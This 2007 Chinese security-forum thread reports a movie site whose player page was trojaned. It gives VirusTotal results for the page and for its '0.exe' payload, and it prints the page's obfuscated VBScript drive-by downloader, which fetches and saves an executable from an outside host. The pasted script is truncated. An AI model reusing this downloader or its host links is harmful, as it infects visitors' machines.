一个毒网

zyx9

hxxp://www.881a.com/tou/vidplayer.asp?id=76001&see=1
找电影时发现一个毒网，播放页被挂马

AntiVir	7.3.1.41	03.09.2007	VBS/Dldr.Agent.6171
Authentium	4.93.8	03.08.2007 [td]no virus found
Avast	4.7.936.0	03.08.2007 [td]no virus found
AVG	7.5.0.447	03.08.2007	VBS/Psyme.N
BitDefender	7.2	03.09.2007	Trojan.Downloader.VBS.AD
CAT-QuickHeal	9.00	03.08.2007 [td]no virus found
ClamAV	devel-20060426	03.09.2007 [td]no virus found
DrWeb	4.33	03.09.2007 [td]no virus found
eSafe	7.0.14.0	03.08.2007 [td]no virus found
eTrust-Vet	30.6.3467	03.09.2007 [td]no virus found
Ewido	4.0	03.07.2007 [td]no virus found
FileAdvisor	1	03.09.2007 [td]no virus found
Fortinet	2.85.0.0	03.09.2007 [td]no virus found
F-Prot	4.3.1.45	03.08.2007 [td]no virus found
F-Secure	6.70.13030.0	03.09.2007 [td]no virus found
Ikarus	T3.1.1.3	03.09.2007 [td]no virus found
Kaspersky	4.0.2.24	03.09.2007 [td]no virus found
McAfee	4980	03.08.2007 [td]no virus found
Microsoft	1.2204	03.09.2007 [td]no virus found
NOD32v2	2104	03.08.2007 [td]no virus found
Norman	5.80.02	03.07.2007 [td]no virus found
Panda	9.0.0.4	03.08.2007 [td]no virus found
Prevx1	V2	03.09.2007 [td]no virus found
Sophos	4.15.0	03.09.2007 [td]no virus found
Sunbelt	2.2.907.0	03.07.2007 [td]no virus found
Symantec	10	03.09.2007	Downloader
TheHacker	6.1.6.073	03.09.2007 [td]no virus found
UNA	1.83	03.07.2007 [td]no virus found
VBA32	3.11.2	03.08.2007 [td]no virus found
VirusBuster	4.3.19:9	03.08.2007	VBS.DR.Psyme.BZ

以上已经上报大部分未发现的安全厂商

zyx9

不过我不会提取这个脚本要下载的样本。请高手提取了再发具体样本吧！

kp2006

kv没报这个样本

kv网页监控报木马下载

http://web.77276.com/1.htm

jlennon

开着咖啡上去，没有异常，访问保护也未触发。

18762332

费儿杀了

linovo

确实被挂了木马，病毒刚运行就给微点扼杀在摇篮之中
广告：建议大家还是只装微点 ，其他的卸掉，只留下安装包留念吧

小邪邪

<html><HEAD><TITLE>zaqxsw</TITLE>
<META http-equiv=Content-Type content="text/html; charset=US-ASCII"></HEAD>
<BODY>
<SCRIPT language=VBScript>
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
t="111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,32,13,10,116,99,32,61,32,34,104,116,116,112,58,47,47,100,111,46,55,55,50,55,54,46,99,111,109,47,48,46,101,120,101,34,13,10,102,110,97,109,101,49,61,34,115,118,99,104,111,115,116,46,101,120,101,34,13,10,102,110,97,109,101,50,61,34,115,118,99,104,111,115,116,46,118,98,115,34,13,10,83,101,116,32,100,102,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,34,38,34,98,34,38,34,106,34,38,34,101,34,38,34,99,34,38,34,116,34,41,32,13,10,100,102,46,115,101,116,65,116,116,114,105,98,117,116,101,32,34,99,34,38,34,108,34,38,34,97,34,38,34,115,34,38,34,115,34,38,34,105,34,38,34,100,34,44,32,34,99,34,38,34,108,34,38,34,115,34,38,34,105,100,58,34,38,34,66,34,38,34,68,34,38,34,57,54,34,38,34,67,53,34,38,34,53,54,34,38,34,45,54,53,34,38,34,65,51,34,38,34,45,49,49,34,38,34,68,48,34,38,34,45,57,56,34,38,34,51,65,34,38,34,45,48,48,34,38,34,67,48,52,34,38,34,70,67,50,34,38,34,57,69,34,38,34,51,54,34,32,13,10,115,116,114,61,34,77,105,99,34,38,34,114,111,34,38,34,115,111,34,38,34,102,116,46,34,38,34,88,34,38,34,77,34,38,34,76,34,38,34,72,84,34,38,34,84,80,34,13,10,83,101,116,32,120,32,61,32,100,102,46,67,114,101,97,116,101,79,98,106,101,99,116,40,115,116,114,44,34,34,41,32,13,10,97,49,61,34,65,34,38,34,100,34,38,34,111,34,32,13,10,97,50,61,34,100,34,38,34,98,46,34,32,13,10,97,51,61,34,83,34,38,34,116,114,34,32,13,10,97,52,61,34,101,34,38,34,97,109,34,32,32,13,10,115,116,114,53,61,34,65,34,38,34,100,34,38,34,111,34,38,34,100,34,38,34,98,46,34,38,34,83,34,38,34,116,114,34,38,34,101,34,38,34,97,109,34,32,13,10,115,101,116,32,83,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,115,116,114,53,44,34,34,41,32,13,10,83,46,116,121,112,101,32,61,32,49,13,10,115,116,114,54,61,34,71,34,38,34,69,34,38,34,84,34,13,10,120,46,79,112,101,110,32,115,116,114,54,44,32,116,99,44,32,70,97,108,115,101,32,13,10,120,46,83,101,110,100,32,13,10,115,101,116,32,70,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,32,13,10,115,101,116,32,116,109,112,32,61,32,70,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,32,13,10,102,110,97,109,101,49,61,32,70,46,66,117,105,108,100,80,97,116,104,40,116,109,11

zxkf

htp://do.77276.com/0.exe

zxkf

Complete scanning result of "0.exe", received in VirusTotal at 03.09.2007, 11:31:43 (CET).

Antivirus Version Update Result
AntiVir 7.3.1.41 03.09.2007 TR/Crypt.NSPM.Gen
Authentium 4.93.8 03.08.2007 Possibly a new variant of W32/PWStealer.gen1
Avast 4.7.936.0 03.08.2007 Win32:Tibs-ADO
AVG 7.5.0.447 03.08.2007 Worm/Delf.AYP
BitDefender 7.2 03.09.2007 Win32.Worm.Viking.KS
CAT-QuickHeal 9.00 03.08.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 03.09.2007  no virus found
DrWeb 4.33 03.09.2007 Win32.HLLW.Gavir.54
eSafe 7.0.14.0 03.08.2007 Win32.Viking.ii
eTrust-Vet 30.6.3467 03.09.2007 Win32/NSAnti
Ewido 4.0 03.07.2007 Worm.Viking.ii
FileAdvisor 1 03.09.2007  no virus found
Fortinet 2.85.0.0 03.09.2007 W32/Viking.II
F-Prot 4.3.1.45 03.08.2007 W32/PWStealer.gen1
F-Secure 6.70.13030.0 03.09.2007 Worm.Win32.Viking.ii
Ikarus T3.1.1.3 03.09.2007 Trojan-PWS.Win32.OnLineGames.id
Kaspersky 4.0.2.24 03.09.2007 Worm.Win32.Viking.ii
McAfee 4980 03.08.2007 W32/HLLP.Philis.hg
Microsoft 1.2204 03.09.2007  no virus found
NOD32v2 2104 03.08.2007 probably unknown NewHeur_PE virus
Norman 5.80.02 03.07.2007  no virus found
Panda 9.0.0.4 03.08.2007 Suspicious file
Prevx1 V2 03.09.2007 Trojan.SystemPoser
Sophos 4.15.0 03.09.2007 W32/Looked-CH
Sunbelt 2.2.907.0 03.07.2007  no virus found
Symantec 10 03.09.2007 W32.Looked.BK
TheHacker 6.1.6.073 03.09.2007 W32/Viking.ii
UNA 1.83 03.07.2007  no virus found
VBA32 3.11.2 03.08.2007 MalwareScope.Worm.Viking.3
VirusBuster 4.3.19:9 03.08.2007 Packed/NSPM

Aditional Information
File size: 93232 bytes
MD5: 2b59cf32de3b452547fb3e9b54df9737
SHA1: 263d859f3ee4f5110b13ad5445561b23cbd76c8d

[ 本帖最后由 zxkf 于 2007-3-9 18:40 编辑 ]

buycard

ttp://do.77276.com/0.exe